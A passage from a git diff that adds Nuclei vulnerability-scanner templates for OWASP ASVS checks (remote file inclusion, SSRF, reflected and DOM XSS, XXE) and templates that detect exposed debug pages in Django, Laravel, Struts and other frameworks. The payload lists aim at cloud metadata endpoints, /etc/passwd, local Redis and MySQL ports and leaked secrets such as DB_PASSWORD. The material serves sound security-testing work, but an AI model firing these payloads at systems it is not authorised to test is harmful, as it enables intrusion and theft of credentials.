@@ +id: ASVS-4-0-3-V12-3-3 + +info: + name: ASVS 12.3.3 Check + author: AmirHossein Raeisi + severity: high + classification: + cwe-id: CWE-918, CWE-98 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/ + + tags: asvs,12.3.3 + + description: | + Verify that user-submitted filename metadata is validated or ignored to prevent the disclosure or execution of remote files via Remote File Inclusion (RFI) or Server-side Request Forgery (SSRF) attacks. + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + rfi: + - "https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/rfi.txt" + - "https://{{interactsh-url}}" + + fuzzing: + - part: query + mode: single + fuzz: + - "{{rfi}}" + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a" + + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" diff --git a/templates/dast/5.2.6.yaml b/templates/dast/5.2.6.yaml new file mode 100644 index 0000000..48d7186 --- /dev/null +++ b/templates/dast/5.2.6.yaml @@ -0,0 +1,106 @@ +id: ASVS-4-0-3-V5-2-6 + +info: + name: ASVS 5.2.6 Check + author: AmirHossein Raeisi + severity: high + classification: + cwe-id: CWE-918 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/response-ssrf.yaml + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ + tags: asvs,5.2.6 + description: | + Verify that the application protects against SSRF attacks, by validating or sanitizing untrusted data or HTTP file metadata, such as filenames and URL input fields, and uses allow lists of protocols, domains, paths and ports. + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + ssrf: + - 'http://{{interactsh-url}}' + - 'http://{{FQDN}}.{{interactsh-url}}' + - 'http://{{FQDN}}@{{interactsh-url}}' + - 'http://{{interactsh-url}}#{{FQDN}}' + - 'http://{{RDN}}.{{interactsh-url}}' + - 'http://{{RDN}}@{{interactsh-url}}' + - 'http://{{interactsh-url}}#{{RDN}}' + - 'file:////./etc/./passwd' + - 'file:///c:/./windows/./win.ini' + - 'http://metadata.tencentyun.com/latest/meta-data/' + - 'http://100.100.100.200/latest/meta-data/' + - 'http://169.254.169.254/latest/meta-data/' + - 'http://169.254.169.254/metadata/v1' + - 'http://127.0.0.1:22' + - 'http://127.0.0.1:3306' + - 'dict://127.0.0.1:6379/info' + + fuzzing: + - part: query + mode: single + fuzz: + - "{{ssrf}}" + + - part: body + mode: single + fuzz: + - "{{ssrf}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + + - type: word + part: body + words: + - "Interactsh Server" + + - type: regex + part: body + regex: + - 'SSH-(\d.\d)-OpenSSH_(\d.\d)' + + - type: regex + part: body + regex: + - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)' + + - type: regex + part: body + regex: + - '(\d.\d.\d)(.*?)mysql_native_password' + + - type: regex + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + part: body + words: + - 'for 16-bit app support' + + - type: regex + part: body + regex: + - 'dns-conf\/[\s\S]+instance\/' + + - type: regex + part: body + regex: + - 'app-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'ami-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'id[\s\S]+interfaces\/' diff --git a/templates/dast/5.3.3.2.yaml b/templates/dast/5.3.3.2.yaml new file mode 100644 index 0000000..a8d0005 --- /dev/null +++ b/templates/dast/5.3.3.2.yaml @@ -0,0 +1,56 @@ +id: ASVS-4-0-3-V5-3-3-2 + +info: + name: ASVS 5.3.3.2 (Reflected XSS) Check + author: AmirHossein Raeisi + severity: medium + classification: + cwe-id: CWE-79 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xss/reflected-xss.yaml +tags: asvs,5.3.3 +description: | + Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. ([C4](https://owasp.org/www-project-proactive-controls/#div-numbering)) + +variables: + first: "{{rand_int(10000, 99999)}}" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + reflection: + - "'\"><{{first}}>" + - "'><{{first}}>" + - "\"><{{first}}>" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + - part: path + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{reflection}}" + + - type: word + part: header + words: + - "text/html" diff --git a/templates/dast/5.5.2.yaml b/templates/dast/5.5.2.yaml new file mode 100644 index 0000000..13f7fe5 --- /dev/null +++ b/templates/dast/5.5.2.yaml @@ -0,0 +1,62 @@ +id: ASVS-4-0-3-V5-5-2 + +info: + name: ASVS 5.5.2 Check + author: AmirHossein Raeisi + severity: High + classification: + cwe-id: CWE-611 + reference: + - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xxe/generic-xxe.yaml + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection + tags: asvs,5.5.2 + description: | + Verify that the application correctly restricts XML parsers to only use the most restrictive configuration possible and to ensure that unsafe features such as resolving external entities are disabled to prevent XML eXternal Entity (XXE) attacks. + +variables: + rletter: "{{rand_base(6,'abc')}}" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + xxe: + - ' ]>&{{rletter}};' + - ' ]>&{{rletter}};' + - ' ]>&{{rletter}};' + + fuzzing: + - part: query + keys-regex: + - "(.*?)xml(.*?)" + fuzz: + - "{{xxe}}" + + - part: query + values: + - "(" + fuzz: + - "{{xxe}}" + + stop-at-first-match: true + matchers: + - type: regex + name: linux + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + name: windows + part: body + words: + - 'for 16-bit app support' + + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/templates/headless/5.3.3.1.yaml b/templates/headless/5.3.3.1.yaml new file mode 100644 index 0000000..f3fb1a5 --- /dev/null +++ b/templates/headless/5.3.3.1.yaml @@ -0,0 +1,54 @@ +id: ASVS-4-0-3-V5-3-3-1 + +info: + name: ASVS 5.3.3.1 (Dom-based XSS) Check + author: AmirHossein Raeisi + severity: medium + classification: + cwe-id: CWE-79 + reference: + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xss/dom-xss.yaml + tags: asvs,5.3.3 + description: | + Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. ([C4](https://owasp.org/www-project-proactive-controls/#div-numbering)) + +variables: + num: "{{rand_int(10000, 99999)}}" +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + + - action: waitload + payloads: + reflection: + - "'\">

{{num}}

" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + - part: path + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

{{num}}

" + + - type: word + part: header + words: + - "text/html" \ No newline at end of file diff --git a/templates/workflows/14.3.2.yaml b/templates/workflows/14.3.2.yaml index ce7ab3e..7f941cb 100644 --- a/templates/workflows/14.3.2.yaml +++ b/templates/workflows/14.3.2.yaml @@ -13,28 +13,28 @@ info: Verify that web or application server and application framework debug modes are disabled in production to eliminate debug features, developer consoles, and unintended security disclosures. workflows: - - template: misconfiguration/symfony-debug.yaml - - template: exposures/logs/rails-debug-mode.yaml - - template: misconfiguration/debug/bottle-debug.yaml - - template: misconfiguration/debug/ampache-debug.yaml - - template: misconfiguration/laravel-debug-enabled.yaml - - template: misconfiguration/laravel-debug-infoleak.yaml - - template: misconfiguration/laravel-debug-error.yaml - - template: misconfiguration/aspx-debug-mode.yaml - - template: exposures/logs/jboss-seam-debug-page.yaml - - template: misconfiguration/struts-ognl-console.yaml - - template: exposures/logs/struts-problem-report.yaml - - template: misconfiguration/sitecore-debug-page.yaml - - template: exposures/logs/django-debug-exposure.yaml - - template: misconfiguration/rekognition-image-validation.yaml - - template: misconfiguration/browserless-debugger.yaml - - template: exposures/logs/struts-debug-mode.yaml - - template: misconfiguration/django-debug-detect.yaml - - template: misconfiguration/airflow/airflow-debug.yaml - - template: misconfiguration/php-debugbar-exposure.yaml - - template: misconfiguration/wamp-xdebug-detect.yaml - - template: misconfiguration/typo3-debug-mode.yaml - - template: exposures/logs/pyramid-debug-toolbar.yaml - - template: misconfiguration/php-errors.yaml - - template: vulnerabilities/jenkins/jenkins-stack-trace.yaml - - template: technologies/werkzeug-debugger-detect.yaml \ No newline at end of file + - template: workflows/misconfiguration/symfony-debug.yaml + - template: workflows/exposures/logs/rails-debug-mode.yaml + - template: workflows/misconfiguration/debug/bottle-debug.yaml + - template: workflows/misconfiguration/debug/ampache-debug.yaml + - template: workflows/misconfiguration/laravel-debug-enabled.yaml + - template: workflows/misconfiguration/laravel-debug-infoleak.yaml + - template: workflows/misconfiguration/laravel-debug-error.yaml + - template: workflows/misconfiguration/aspx-debug-mode.yaml + - template: workflows/exposures/logs/jboss-seam-debug-page.yaml + - template: workflows/misconfiguration/struts-ognl-console.yaml + - template: workflows/exposures/logs/struts-problem-report.yaml + - template: workflows/misconfiguration/sitecore-debug-page.yaml + - template: workflows/exposures/logs/django-debug-exposure.yaml + - template: workflows/misconfiguration/rekognition-image-validation.yaml + - template: workflows/misconfiguration/browserless-debugger.yaml + - template: workflows/exposures/logs/struts-debug-mode.yaml + - template: workflows/misconfiguration/django-debug-detect.yaml + - template: workflows/misconfiguration/airflow/airflow-debug.yaml + - template: workflows/misconfiguration/php-debugbar-exposure.yaml + - template: workflows/misconfiguration/wamp-xdebug-detect.yaml + - template: workflows/misconfiguration/typo3-debug-mode.yaml + - template: workflows/exposures/logs/pyramid-debug-toolbar.yaml + - template: workflows/misconfiguration/php-errors.yaml + - template: workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml + - template: workflows/technologies/werkzeug-debugger-detect.yaml diff --git a/templates/workflows/exposures/logs/django-debug-exposure.yaml b/templates/workflows/exposures/logs/django-debug-exposure.yaml new file mode 100644 index 0000000..31c6aaa --- /dev/null +++ b/templates/workflows/exposures/logs/django-debug-exposure.yaml @@ -0,0 +1,33 @@ +id: django-debug-exposure + +info: + name: Django Debug Exposure + author: geeknik + severity: high + description: Django debug mode enabled exposes internal information. + reference: + - https://twitter.com/Alra3ees/status/1397660633928286208 + metadata: + max-request: 1 + tags: django,exposure + +http: + - method: POST + path: + - "{{BaseURL}}/admin/login/?next=/admin/" + + matchers-condition: and + matchers: + - type: status + status: + - 500 + + - type: word + part: body + words: + - "DB_HOST" + - "DB_NAME" + - "DJANGO" + - "ADMIN_PASSWORD" + condition: and +# digest: 4a0a00473045022075f8eb23f058287e94f409e156c595d9a3160eeca81f66a83d61be4144301dc7022100a96b53e8b7688c50241e531c5e45dac6fb3788d27fce1f21ac315b1279ddbbf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/exposures/logs/jboss-seam-debug-page.yaml b/templates/workflows/exposures/logs/jboss-seam-debug-page.yaml new file mode 100644 index 0000000..261c65f --- /dev/null +++ b/templates/workflows/exposures/logs/jboss-seam-debug-page.yaml @@ -0,0 +1,30 @@ +id: jboss-seam-debug-page + +info: + name: Jboss Seam Debug Page Enabled + author: dhiyaneshDK + severity: medium + description: Jboss Seam Debug Page was exposed. + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jboss-seam-debug-page.yaml + metadata: + max-request: 1 + tags: jboss,logs,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/debug.seam" + + matchers-condition: and + matchers: + - type: word + words: + - "SeamDebugPage" + - "org.jboss.seam" + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100e8411b45c22ca433e5f3bd5fe956f5b345fc7057cfd50ba2e94466da76bccc48022100d548feaa4f8967210c5093ab640433f3dcbc610e1afe2e12b9bf2232fa240129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml b/templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml new file mode 100644 index 0000000..8f82ce0 --- /dev/null +++ b/templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml @@ -0,0 +1,31 @@ +id: pyramid-debug-toolbar + +info: + name: Pyramid Debug Toolbar + author: geeknik + severity: medium + description: Pyramid Debug Toolbar provides a debug toolbar useful while you are developing your Pyramid application. + reference: + - https://github.com/Pylons/pyramid_debugtoolbar + metadata: + max-request: 1 + tags: pyramid,logs,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/_debug_toolbar/" + + matchers-condition: and + matchers: + - type: word + words: + - "Pyramid Debug Toolbar" + - "Pyramid DebugToolbar" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a0047304502203726e298675935a1a75fbcbe9ce8316c4ae6ef30822fb311a5004539662e1798022100bc0f0f98f4fcb801279da72e8eca3bf8eae9c211edcf6e89ad9bfc35f8708b32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/exposures/logs/rails-debug-mode.yaml b/templates/workflows/exposures/logs/rails-debug-mode.yaml new file mode 100644 index 0000000..7b30e36 --- /dev/null +++ b/templates/workflows/exposures/logs/rails-debug-mode.yaml @@ -0,0 +1,24 @@ +id: rails-debug-mode + +info: + name: Rails Debug Mode + author: pdteam + severity: medium + description: Rails debug mode is enabled. + metadata: + max-request: 1 + tags: debug,rails,exposure,intrusive + +http: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + matchers: + - type: word + part: body + words: + - "Rails.root:" + - "Action Controller: Exception caught" + condition: and +# digest: 4a0a00473045022032b4ac1b752bc49bad211b086747a6b513069249d0119c514d0c5bb4273ce0f3022100bb3cffbab5dc40220beeb5c9a33a8b54794e5ab5086e8ec6aacbe479ec7c94a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/exposures/logs/struts-debug-mode.yaml b/templates/workflows/exposures/logs/struts-debug-mode.yaml new file mode 100644 index 0000000..f0c8fb6 --- /dev/null +++ b/templates/workflows/exposures/logs/struts-debug-mode.yaml @@ -0,0 +1,23 @@ +id: struts-debug-mode + +info: + name: Apache Struts setup in Debug-Mode + author: pdteam + severity: low + description: Apache Struts debug mode is enabled. + metadata: + max-request: 1 + tags: logs,struts,apache,exposure,setup + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "" + - "" + condition: and +# digest: 4a0a00473045022100bf6dbd31ef92f8e1dc40fb686e16761845933696c79fb4bb1b2576a03644deb0022005dd1ca7689260b05edd0714b26365856dec3d802159866075540766f352e443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/exposures/logs/struts-problem-report.yaml b/templates/workflows/exposures/logs/struts-problem-report.yaml new file mode 100644 index 0000000..2c1bfa9 --- /dev/null +++ b/templates/workflows/exposures/logs/struts-problem-report.yaml @@ -0,0 +1,29 @@ +id: struts-problem-report + +info: + name: Apache Struts Dev Mode - Detect + author: dhiyaneshDK + severity: low + description: Multiple Apache Struts applications were detected in dev-mode. + reference: + - https://www.exploit-db.com/ghdb/4278 + metadata: + max-request: 1 + tags: struts,debug,edb,exposure,apache + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Struts Problem Report' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022072b2375b4cd9dbf2bcce90d71c72e6c52718019b361ce71eea5f617c6a3904e1022100dc2851ed0fcc38ac40f189bfbaef67f1afbef38a0e43466dfdd3eb6005efd6a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/airflow/airflow-debug.yaml b/templates/workflows/misconfiguration/airflow/airflow-debug.yaml new file mode 100644 index 0000000..8742106 --- /dev/null +++ b/templates/workflows/misconfiguration/airflow/airflow-debug.yaml @@ -0,0 +1,31 @@ +id: airflow-debug + +info: + name: Airflow Debug Trace + author: pdteam + severity: low + description: Airflow Debug Trace enabled. + metadata: + verified: true + max-request: 1 + shodan-query: title:"Airflow - DAGs" + tags: apache,airflow,fpd,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

Ooops.

" + - "Traceback (most recent call last)" + condition: and + + - type: status + status: + - 500 +# digest: 4a0a00473045022100b07309b0cbd96d505399c9c82239f762478a3023c1e8556e3e6d773d6afd1416022012c8681190e9080dab6e8fb7278dd01ea443ade8c3845cd3550bda5352584ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/aspx-debug-mode.yaml b/templates/workflows/misconfiguration/aspx-debug-mode.yaml new file mode 100644 index 0000000..4dd64d7 --- /dev/null +++ b/templates/workflows/misconfiguration/aspx-debug-mode.yaml @@ -0,0 +1,38 @@ +id: aspx-debug-mode + +info: + name: ASP.NET Debugging Enabled + author: dhiyaneshDk + severity: info + reference: + - https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled + metadata: + max-request: 1 + tags: debug,misconfig + +http: + - raw: + - | + DEBUG /Foobar-debug.aspx HTTP/1.1 + Host: {{Hostname}} + Command: stop-debug + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Content-Length: 2 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'OK' + part: body + + - type: word + words: + - 'Content-Length: 2' + part: header + +# digest: 4a0a00473045022100e7a32aaa7cff08a4dddee13a653b02f87f89517cf5265e21898c31c6f96f25a90220098bf55aeaca69565900838b0a9ea62c3669bf923e3d1a0ec98c7e6db27b77de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/browserless-debugger.yaml b/templates/workflows/misconfiguration/browserless-debugger.yaml new file mode 100644 index 0000000..f3ab2b6 --- /dev/null +++ b/templates/workflows/misconfiguration/browserless-debugger.yaml @@ -0,0 +1,33 @@ +id: browserless-debugger + +info: + name: Exposed Browserless debugger + author: ggranjus + severity: medium + description: Browserless instance can be used to make web requests. May worth checking /workspace for juicy files. + reference: + - https://docs.browserless.io/docs/docker.html#securing-your-instance + metadata: + max-request: 1 + shodan-query: http.title:"browserless debugger" + tags: browserless,unauth,debug,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "browserless debugger" + - "Click the ► button to run your code." + condition: or + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100fbc099737ef182029191e896b9806e610a162693a38bcbf4fabd84a3a064ce64022100cb27dd4e8aa539c21facd415d9a3d360e356988d5e4a4f33d57178e4d1602959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/debug/ampache-debug.yaml b/templates/workflows/misconfiguration/debug/ampache-debug.yaml new file mode 100644 index 0000000..864f52e --- /dev/null +++ b/templates/workflows/misconfiguration/debug/ampache-debug.yaml @@ -0,0 +1,34 @@ +id: ampache-debug + +info: + name: Ampache Debug Page + author: ritikchaddha + severity: info + metadata: + verified: true + max-request: 2 + shodan-query: http.title:"Ampache -- Debug Page" + tags: misconfig,ampache,debug + +http: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/test.php?action=config' + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Ampache Debug" + + - type: status + status: + - 200 + +# digest: 490a0046304402204fc96c27b19ab1615ece4b327244a62166cee8f2f8aabd0a48dbefab8865984502201572545154f63f6bf6f67cbbdbc65d7a0e7b286b67fdcf4424c5e5c446cb48ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/debug/bottle-debug.yaml b/templates/workflows/misconfiguration/debug/bottle-debug.yaml new file mode 100644 index 0000000..efc4dd0 --- /dev/null +++ b/templates/workflows/misconfiguration/debug/bottle-debug.yaml @@ -0,0 +1,36 @@ +id: bottle-debug + +info: + name: Bottle debug mode enabled + author: viondexd + severity: info + reference: + - https://bottlepy.org/docs/dev/tutorial.html#debug-mode + metadata: + verified: true + max-request: 1 + shodan-query: html:"Sorry, the requested URL" + tags: bottle,exposure,debug,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Sorry, the requested URL " + - " caused an error:" + condition: and + + - type: word + part: body + words: + - "'{{BaseURL}}'" + - "'{{BaseURL}}/'" + condition: or + +# digest: 4a0a00473045022012b6c62f22fdb55acfcc6273506038637071f337b450e4cc0f8950870e324624022100f75350502fd6d4b2c633ea8670b249e594b40748f5a1ca5df478d71059a6a64d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/django-debug-detect.yaml b/templates/workflows/misconfiguration/django-debug-detect.yaml new file mode 100644 index 0000000..0b0a84e --- /dev/null +++ b/templates/workflows/misconfiguration/django-debug-detect.yaml @@ -0,0 +1,29 @@ +id: django-debug + +info: + name: Django Debug Configuration Enabled + author: dhiyaneshDK,hackergautam + severity: medium + description: Django debug configuration is enabled, which allows an attacker to obtain system configuration information such as paths or settings. + metadata: + max-request: 1 + tags: django,debug,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/NON_EXISTING_PATH/" + + matchers-condition: and + matchers: + - type: word + words: + - URLconf defined + - Page not found + - Django tried these URL patterns, in this order + condition: and + + - type: status + status: + - 404 +# digest: 4a0a0047304502204a5ac1486faa3be8702801b635c79e5a565724d1843641c69a5a09d012b23233022100a2ce507b92c7ffc804f071bc47c76185c97613307e1e15be73a224a45da5fa6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/laravel-debug-enabled.yaml b/templates/workflows/misconfiguration/laravel-debug-enabled.yaml new file mode 100644 index 0000000..1b0a861 --- /dev/null +++ b/templates/workflows/misconfiguration/laravel-debug-enabled.yaml @@ -0,0 +1,31 @@ +id: laravel-debug-enabled + +info: + name: Laravel Debug Enabled + author: notsoevilweasel + severity: medium + description: | + Laravel with APP_DEBUG set to true is prone to show verbose errors. + remediation: | + Disable Laravel's debug mode by setting APP_DEBUG to false. + metadata: + max-request: 1 + tags: debug,laravel,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/_ignition/health-check" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - can_execute_commands + + - type: status + status: + - 200 + +# digest: 4a0a00473045022021f5d4e0139f8896fd4f330b08e129cdf385a67aab51ba5516fafd4b4ff0335a022100d877024cf9f3def775870120ada78e34b730ef7acdf0c6b30f58fff4f9ec6549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/laravel-debug-error.yaml b/templates/workflows/misconfiguration/laravel-debug-error.yaml new file mode 100644 index 0000000..9f775ad --- /dev/null +++ b/templates/workflows/misconfiguration/laravel-debug-error.yaml @@ -0,0 +1,26 @@ +id: laravel-debug-error + +info: + name: Larvel Debug Method Enabled + author: dhiyaneshDK + severity: medium + description: Larvel Debug method is enabled. + metadata: + max-request: 1 + tags: debug,laravel,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - Whoops! There was an error + + - type: status + status: + - 500 +# digest: 4b0a00483046022100a27980313b04765c0889cf3781ae98a717537c8bf226181548f1befb4b88bc0b022100b5c1947c8918d39d6a6e27b7917edc78bb098d331d886b26e3ac00da1603a76c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/laravel-debug-infoleak.yaml b/templates/workflows/misconfiguration/laravel-debug-infoleak.yaml new file mode 100644 index 0000000..af8a6bd --- /dev/null +++ b/templates/workflows/misconfiguration/laravel-debug-infoleak.yaml @@ -0,0 +1,53 @@ +id: laravel-debug-infoleak + +info: + name: Laravel Debug Info Leak + author: pwnhxl + severity: medium + description: | + This template can be used to detect a Laravel debug information leak by making a POST-based request. + reference: + - https://github.com/dem0ns/improper/blob/master/laravel/5_debug/1.png + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cwe-id: CWE-215 + metadata: + verified: true + max-request: 1 + shodan-query: Laravel-Framework + fofa-query: app="Laravel-Framework" + tags: misconfig,laravel,debug,infoleak + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'vendor/laravel/framework/src/Illuminate/' + - 'MethodNotAllowedHttpException' + condition: and + + - type: word + part: body + words: + - 'DB_PASSWORD' + - 'REDIS_PASSWORD' + - 'MAIL_PASSWORD' + - 'ALIYUN_ACCESSKEYSECRET' + - 'ALIYUN_ACCESSKEYID' + - 'SMS_AUTH_TOKEN' + - 'APP_KEY' + condition: or + + - type: status + status: + - 405 + +# digest: 4a0a00473045022100efe35d703b8ce007284a549152d7642cbaa469dc719432098c9e359f0cdc9e5c02206f93a03a347968aef317624daa120c7827f1bdef918edeb7c5a7d9d50a968827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/php-debugbar-exposure.yaml b/templates/workflows/misconfiguration/php-debugbar-exposure.yaml new file mode 100644 index 0000000..ffb0fd2 --- /dev/null +++ b/templates/workflows/misconfiguration/php-debugbar-exposure.yaml @@ -0,0 +1,34 @@ +id: php-debugbar-exposure + +info: + name: Php Debug Bar - Exposure + author: ritikchaddha,pdteam + severity: medium + description: | + The DebugBar integrates easily in any projects and can display profiling data from any part of your application. It comes built-in with data collectors for standard PHP features and popular projects. + reference: + - https://hackerone.com/reports/1883806 + - http://phpdebugbar.com/ + - https://github.com/maximebf/php-debugbar + metadata: + verified: true + max-request: 2 + shodan-query: html:"phpdebugbar" + tags: hackerone,misconfig,php,phpdebug,exposure + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/_debugbar/open" + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'contains(body_1, "phpdebugbar") && contains(body, "widget")' + - 'contains_all(body_2, "\"utime\"","\"datetime\"","{\"id") && contains(content_type_2, "application/json")' + condition: or + +# digest: 4a0a00473045022055cb94f2a7454c92dcfed134429b31582f5c4e40bd7915cb109f7e28c7d3c533022100f1b29be9749442a2831ed29e39e61e64b9050dfa755a41ec6bc38abf7abab8d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/php-errors.yaml b/templates/workflows/misconfiguration/php-errors.yaml new file mode 100644 index 0000000..a5e9ee7 --- /dev/null +++ b/templates/workflows/misconfiguration/php-errors.yaml @@ -0,0 +1,47 @@ +id: php-errors + +info: + name: PHP errors + author: w4cky_,geeknik,dhiyaneshDK + severity: info + metadata: + max-request: 1 + shodan-query: http.title:"PHP warning" || "Fatal error" + tags: debug,php,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + regex: + - '(?i)Fatal error' + - '(?i)Call to undefined method' + - '(?i)You have an error in your SQL syntax' + - '(?i)MySQL server version for the right syntax to use near' + - '(?i)MySQL cannot create a temporary file' + - '(?i)PHP (Warning|Error)' + - '(?m)^([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$' + - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' + - '(?i)failed to open stream\:' + - '(?i)SAFE MODE Restriction in effect' + - '(?i)Cannot modify header information' + - '(?i)ORA-00921\: unexpected end of SQL command' + - '(?i)ORA-00933\: SQL command not properly ended' + - '(?i)ORA-00936\: missing expression' + - '(?i)ORA-12541\: TNS\:no listener' + - '(?i)uncaught exception' + - '(?i)include_path' + - '(?i)undefined index' + - '(?i)undefined variable\:' + - '(?i)stack trace\:' + - '(?i)expects parameter [0-9]*' + - '(?i)Debug Trace' + - '(?i)<b>Parse error</b>' + - '(?i)syntax error, unexpected' + - '(?i)Allowed Memory Size of \d* Bytes Exhausted' + - '(?i)Maximum execution time of \d* seconds exceeded' + +# digest: 4a0a004730450220253c9cfefeec7f15310fe83d714b5ca6145b0a01cf27947bebe4b9de25acdf4e022100b95ea3ebd9a8458311947ef44210a5752d427f1f37e68bdf5dd996655e909702:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/rekognition-image-validation.yaml b/templates/workflows/misconfiguration/rekognition-image-validation.yaml new file mode 100644 index 0000000..05ba29b --- /dev/null +++ 